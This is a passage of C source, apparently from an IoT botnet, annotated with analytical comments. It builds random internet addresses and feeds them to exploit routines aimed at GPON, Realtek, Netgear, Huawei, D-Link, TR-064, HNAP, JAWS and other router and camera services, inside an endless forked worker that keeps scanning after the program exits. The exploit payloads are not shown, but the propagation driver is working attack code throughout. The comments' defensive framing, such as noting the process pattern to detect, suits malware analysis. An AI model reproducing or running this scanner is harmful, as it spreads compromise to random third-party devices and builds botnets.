    ipState[0] = GPON2_Range[gpon2_range1];ipState[4] = GPON2_Range[gpon2_range2];ipState[8] = GPON2_Range[gpon2_range3];
    ipState[12] = GPON2_Range[gpon2_range4];ipState[16] = GPON2_Range[gpon2_range5];ipState[20] = GPON2_Range[gpon2_range6];
    ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;
    ipState[9] = rand() % 255;ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[13] = rand() % 255;ipState[14] = rand() % 255;ipState[15] = rand() % 255;
    ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;

    sprintf(gpon2_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(gpon2_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(gpon2_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(gpon2_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(gpon2_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(gpon2_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);

    // each call forks; the parent side returns immediately
    exploit_socket_gpon80(gpon2_ip1);exploit_socket_gpon80(gpon2_ip2);exploit_socket_gpon80(gpon2_ip3);exploit_socket_gpon80(gpon2_ip4);exploit_socket_gpon80(gpon2_ip5);exploit_socket_gpon80(gpon2_ip6);
}
403 | ||
// Build ten fully random dotted-quad strings — first octet rand() % 233
// (0..232), the other three rand() % 255 (0..254) — and hand each one to
// exploit_socket_realtek(), which forks a child per address.
// Notes: reseeded from time(NULL) on every call (<time.h> is not included);
// nothing excludes private, loopback or otherwise reserved ranges, so this
// generator will also emit addresses inside the operator's own networks.
// Uses all 40 entries of ipState. Char arrays are passed to an
// unsigned char * parameter (implicit pointer conversion).
void REALTEK_IPGen()
{
    char realtek_ip1[16] = {0};char realtek_ip2[16] = {0};char realtek_ip3[16] = {0};char realtek_ip4[16] = {0};char realtek_ip5[16] = {0};
    char realtek_ip6[16] = {0};char realtek_ip7[16] = {0};char realtek_ip8[16] = {0};char realtek_ip9[16] = {0};char realtek_ip10[16] = {0};

    srand(time(NULL));
    // every fourth entry (0,4,8,...,36) is a first octet: rand() % 233
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
    ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
    ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
    ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
    ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
    ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
    ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
    ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;

    sprintf(realtek_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(realtek_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(realtek_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(realtek_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(realtek_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(realtek_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
    sprintf(realtek_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(realtek_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
    sprintf(realtek_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(realtek_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);

    // each call forks; the parent side returns immediately
    exploit_socket_realtek(realtek_ip1);exploit_socket_realtek(realtek_ip2);exploit_socket_realtek(realtek_ip3);exploit_socket_realtek(realtek_ip4);exploit_socket_realtek(realtek_ip5);
    exploit_socket_realtek(realtek_ip6);exploit_socket_realtek(realtek_ip7);exploit_socket_realtek(realtek_ip8);exploit_socket_realtek(realtek_ip9);exploit_socket_realtek(realtek_ip10);
}
428 | ||
// Identical construction to REALTEK_IPGen() (ten addresses, first octet
// rand() % 233, others rand() % 255, reseeded from time(NULL) each call,
// no reserved-range exclusion); each address goes to exploit_socket_netgear(),
// which forks a child that probes ports 8080 and 80.
void NETGEAR_IPGen()
{
    char netgear_ip1[16] = {0};char netgear_ip2[16] = {0};char netgear_ip3[16] = {0};char netgear_ip4[16] = {0};char netgear_ip5[16] = {0};
    char netgear_ip6[16] = {0};char netgear_ip7[16] = {0};char netgear_ip8[16] = {0};char netgear_ip9[16] = {0};char netgear_ip10[16] = {0};

    srand(time(NULL));
    // every fourth entry (0,4,8,...,36) is a first octet: rand() % 233
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
    ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
    ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
    ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;
    ipState[20] = rand() % 233;ipState[21] = rand() % 255;ipState[22] = rand() % 255;ipState[23] = rand() % 255;ipState[24] = rand() % 233;
    ipState[25] = rand() % 255;ipState[26] = rand() % 255;ipState[27] = rand() % 255;ipState[28] = rand() % 233;ipState[29] = rand() % 255;
    ipState[30] = rand() % 255;ipState[31] = rand() % 255;ipState[32] = rand() % 233;ipState[33] = rand() % 255;ipState[34] = rand() % 255;
    ipState[35] = rand() % 255;ipState[36] = rand() % 233;ipState[37] = rand() % 255;ipState[38] = rand() % 255;ipState[39] = rand() % 255;

    sprintf(netgear_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(netgear_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(netgear_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(netgear_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(netgear_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);sprintf(netgear_ip6, "%d.%d.%d.%d", ipState[20], ipState[21], ipState[22], ipState[23]);
    sprintf(netgear_ip7, "%d.%d.%d.%d", ipState[24], ipState[25], ipState[26], ipState[27]);sprintf(netgear_ip8, "%d.%d.%d.%d", ipState[28], ipState[29], ipState[30], ipState[31]);
    sprintf(netgear_ip9, "%d.%d.%d.%d", ipState[32], ipState[33], ipState[34], ipState[35]);sprintf(netgear_ip10, "%d.%d.%d.%d", ipState[36], ipState[37], ipState[38], ipState[39]);

    // each call forks; the parent side returns immediately
    exploit_socket_netgear(netgear_ip1);exploit_socket_netgear(netgear_ip2);exploit_socket_netgear(netgear_ip3);exploit_socket_netgear(netgear_ip4);exploit_socket_netgear(netgear_ip5);
    exploit_socket_netgear(netgear_ip6);exploit_socket_netgear(netgear_ip7);exploit_socket_netgear(netgear_ip8);exploit_socket_netgear(netgear_ip9);exploit_socket_netgear(netgear_ip10);
}
453 | ||
// Five random addresses (first octet rand() % 233, others rand() % 255,
// reseeded from time(NULL) each call, no reserved-range exclusion), each
// passed to exploit_socket_huawei(), which forks a child per address.
// Uses ipState[0..19].
void HUAWEI_IPGen()
{
    char huawei_ip1[16] = {0};char huawei_ip2[16] = {0};char huawei_ip3[16] = {0};char huawei_ip4[16] = {0};char huawei_ip5[16] = {0};

    srand(time(NULL));
    // entries 0,4,8,12,16 are first octets: rand() % 233
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;ipState[2] = rand() % 255;ipState[3] = rand() % 255;ipState[4] = rand() % 233;
    ipState[5] = rand() % 255;ipState[6] = rand() % 255;ipState[7] = rand() % 255;ipState[8] = rand() % 233;ipState[9] = rand() % 255;
    ipState[10] = rand() % 255;ipState[11] = rand() % 255;ipState[12] = rand() % 233;ipState[13] = rand() % 255;ipState[14] = rand() % 255;
    ipState[15] = rand() % 255;ipState[16] = rand() % 233;ipState[17] = rand() % 255;ipState[18] = rand() % 255;ipState[19] = rand() % 255;

    sprintf(huawei_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);sprintf(huawei_ip2, "%d.%d.%d.%d", ipState[4], ipState[5], ipState[6], ipState[7]);
    sprintf(huawei_ip3, "%d.%d.%d.%d", ipState[8], ipState[9], ipState[10], ipState[11]);sprintf(huawei_ip4, "%d.%d.%d.%d", ipState[12], ipState[13], ipState[14], ipState[15]);
    sprintf(huawei_ip5, "%d.%d.%d.%d", ipState[16], ipState[17], ipState[18], ipState[19]);

    // each call forks; the parent side returns immediately
    exploit_socket_huawei(huawei_ip1);
    exploit_socket_huawei(huawei_ip2);
    exploit_socket_huawei(huawei_ip3);
    exploit_socket_huawei(huawei_ip4);
    exploit_socket_huawei(huawei_ip5);
}
474 | ||
// One random address (first octet rand() % 233, others rand() % 255,
// reseeded from time(NULL); <time.h> is not included) passed to
// exploit_socket_tr064(), which forks a child probing ports 7574 and 5555.
// No private or reserved ranges are excluded.
void TR064_IPGen()
{
    char tr_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(tr_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_tr064(tr_ip1);  // forks; parent side returns immediately
}
487 | ||
// One random address (first octet rand() % 233, others rand() % 255,
// reseeded from time(NULL) each call) passed to exploit_socket_hnap(),
// which forks a child probing port 80. No reserved ranges are excluded.
void HNAP_IPGen()
{
    char hnap_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(hnap_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_hnap(hnap_ip1);  // forks; parent side returns immediately
}
500 | ||
// One random address (first octet rand() % 233, others rand() % 255,
// reseeded from time(NULL) each call) passed to exploit_socket_crossweb(),
// which forks a child probing port 81. No reserved ranges are excluded.
void CROSSWEB_IPGen()
{
    char crossweb_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(crossweb_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_crossweb(crossweb_ip1);  // forks; parent side returns immediately
}
513 | ||
// One random address (first octet rand() % 233, others rand() % 255,
// reseeded from time(NULL) each call) passed to exploit_socket_jaws(),
// which forks a child probing port 80. No reserved ranges are excluded.
void JAWS_IPGen()
{
    char jaws_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(jaws_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_jaws(jaws_ip1);  // forks; parent side returns immediately
}
526 | ||
// One random address (first octet rand() % 233, others rand() % 255,
// reseeded from time(NULL) each call) passed to exploit_socket_dlink(),
// which forks a child probing port 49152. No reserved ranges are excluded.
void DLINK_IPGen()
{
    char dlink_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(dlink_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_dlink(dlink_ip1);  // forks; parent side returns immediately
}
539 | ||
// One random address (first octet rand() % 233, others rand() % 255,
// reseeded from time(NULL) each call) passed to exploit_socket_r7064() —
// note the name mismatch (R7000 here, r7064 there); it is the port-8443
// probe. No reserved ranges are excluded.
void R7000_IPGen()
{
    char r7000_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(r7000_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_r7064(r7000_ip1);  // forks; parent side returns immediately
}
552 | ||
// One random address (first octet rand() % 233, others rand() % 255,
// reseeded from time(NULL) each call) passed to exploit_socket_vacron()
// (spelled "VARCON" here, "vacron" there); it is the port-8080 /board.cgi
// probe. No reserved ranges are excluded.
void VARCON_IPGen()
{
    char varcon_ip1[16] = {0};

    srand(time(NULL));
    ipState[0] = rand() % 233;ipState[1] = rand() % 255;
    ipState[2] = rand() % 255;ipState[3] = rand() % 255;

    sprintf(varcon_ip1, "%d.%d.%d.%d", ipState[0], ipState[1], ipState[2], ipState[3]);

    exploit_socket_vacron(varcon_ip1);  // forks; parent side returns immediately
}
565 | ||
// Fork a background process that loops forever over the twelve *_IPGen()
// routines with a 300 ms pause before each; the parent (and the fork()-failed
// case) returns immediately. Every pass forks further children (one per
// generated address), none of which is ever waited for — no wait() or
// SIGCHLD handling appears anywhere on this page, so exited children linger
// as zombies in this worker until it dies.
// Pacing: the local counter 'i' triggers "[Pwn] Sleeping For 12 Seconds" and
// a 12 s sleep once it exceeds 10; because it is then reset to i - 10 (= 1)
// rather than 0, the first sleep follows ten passes and later ones nine.
// The loop has no exit condition; exploit_kill() (never called from main()
// here) would SIGKILL this worker via the global exploit_pid.
// Process-tree shape — one long-lived child spawning short-lived grandchildren
// that each open one outbound TCP connection to a random address — is the
// host-side behaviour to look for.
void exploit_worker(void)
{
    int i = 0;  // shadows the file-scope 'i'
    exploit_pid = fork();

    if (exploit_pid > 0 || exploit_pid == -1)
        return;  // parent, or fork() failed
restart:
    i++;
    if (i > 10)
    {
        printf("[Pwn] Sleeping For 12 Seconds\n");
        sleep(12);
        i = i - 10;  // leaves i == 1, not 0
        goto restart;
    }
    usleep(300000);  // 300 ms between generators
    GPON8080_IPGen();
    usleep(300000);
    GPON80_IPGen();
    usleep(300000);
    REALTEK_IPGen();
    usleep(300000);
    NETGEAR_IPGen();
    usleep(300000);
    HUAWEI_IPGen();
    usleep(300000);
    TR064_IPGen();
    usleep(300000);
    HNAP_IPGen();
    usleep(300000);
    CROSSWEB_IPGen();
    usleep(300000);
    JAWS_IPGen();
    usleep(300000);
    DLINK_IPGen();
    usleep(300000);
    R7000_IPGen();
    usleep(300000);
    VARCON_IPGen();
    goto restart;  // unconditional: the worker never returns
}
608 | ||
// Send signal 9 (SIGKILL) to the worker forked by exploit_worker(). Not
// called from main() on this page. Only meaningful in the parent, where
// exploit_pid holds the child's PID; if called before exploit_worker() ran,
// exploit_pid is still 0 and kill(0, ...) addresses the caller's own process
// group. The worker's grandchildren are not signalled by this.
void exploit_kill(void)
{
    kill(exploit_pid, 9);
}
613 | ||
// Entry point: starts the background worker, then blocks on stdin until two
// consecutive newlines (an empty line) arrive, and returns 0. It does not call
// exploit_kill(), so the forked worker — and anything it spawned — keeps
// running after this process exits. argc/argv are unused.
// Note: getchar() returns int; storing it in a char means EOF is never equal
// to '\n', so with stdin closed or at end-of-file the loop spins without
// ever terminating (visible as a CPU-bound process on a detached host).
int main(int argc, char const *argv[])
{
    exploit_worker();  // returns immediately in the parent
    char prev = 0;
    while(1)
    {
        char c = getchar();  // EOF (-1) is truncated into char here
        if(c == '\n' && prev == c)
        {
            // double return pressed!
            break;
        }
        prev = c;
    }
    return 0;  // worker is left running
}